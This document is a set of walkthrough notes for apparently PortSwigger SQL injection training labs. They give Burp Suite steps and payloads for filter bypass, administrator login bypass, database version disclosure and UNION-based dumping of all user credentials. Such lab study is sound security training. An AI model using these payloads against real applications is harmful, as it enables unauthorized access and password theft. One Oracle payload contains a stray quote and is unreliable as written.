# Laboratorio 1
## SQL injection vulnerability in WHERE clause allowing retrieval of hidden data
1. Use Burp Suite to intercept and modify the request that sets the product category filter.
2. Modify the **category** parameter, giving it the value 
```
'+or+1=1--
```
3. Submit the request, and verify that the response now contains one or more unreleased products.
# Laboratorio 2
## SQL injection vulnerability allowing login bypass
1. Use Burp Suite to intercept and modify the request.
2. Modify the **username** parameter, giving it the value:
```
administrator'--
```
# Laboratorio 3
## SQL injection attack, quering the database type and version on Oracle
To know the database version string, we must know that on Oracle databases every SELECT statement must specify a table to select FROM. If our UNION SELECT attack does not query from a table, we will still need to include the FROM keyword followed by a valid table name. 
There is a built-in table on Oracle called **dual** which you can use for this purpose. For example: UNION SELECT 'abc' FROM dual

1. Use Burp Suite to intercept and modify the request that sets the product category filter. 
2. Determine the **number of columns that are being return by the query** and which columns contain text data. Verify that the query is returning two columns, both of which contain text, using payload like the following in the category parameter:
```
'+union+select+'abc','def'+from+dual--
```
3. Use the following payload to display the database version:
```
'+union+select+banner,+null+from+v$version'--
```

# Laboratorio 4
## SQL injection attack, querying the database type and version on MySQL and Microsoft
1. Use Burp Suite to intercept and modify the request that sets the product category filter.
2. Determine the number of columns that are being returned by the query and which columns contain text data. Verify that the query is returning two columns, both of which contain text, using a payload like the following in the `category` parameter:
```
'+union+select+'abc','def'#
```
3. Use the following payload to display the database version:
```
'+union+select+@@version,+null#
```

# Laboratorio 5
## SQL injection attack, listing the database contents on non-Oracle databases
The app has a login function, and the database contains a table that holds usernames and passwords. You need to determine the name of this table and the columns it contains, then retrieve the contents of the table to obtain the username and password of all users.
1. Use Burp Suite to intercept and modify the request that sets the product category filter.
2. Determine the [number of columns that are being returned by the query](https://portswigger.net/web-security/sql-injection/union-attacks/lab-determine-number-of-columns) and [which columns contain text data](https://portswigger.net/web-security/sql-injection/union-attacks/lab-find-column-containing-text). Verify that the query is returning two columns, both of which contain text, using a payload like the following in the `category` parameter:
    
    `'+UNION+SELECT+'abc','def'--`
3. Use the following payload to retrieve the list of tables in the database:
	`'+UNION+SELECT+table_name,+NULL+FROM+information_schema.tables--`
4. Find the name of the table containing user credentials.
5. Use the following payload (replacing the table name) to retrieve the details of the columns in the table:
	`'+UNION+SELECT+column_name,+NULL+FROM+information_schema.columns+WHERE+table_name='users_upbbxi'--`
6. Find the names of the columns containing usernames and passwords.
7. Use the following payload (replacing the table and column names) to retrieve the usernames and passwords for all users:
	`'+UNION+SELECT+username_hkylvs,+password_ixaley+FROM+users_upbbxi--`
8. Find the password for the `administrator` user, and use it to log in.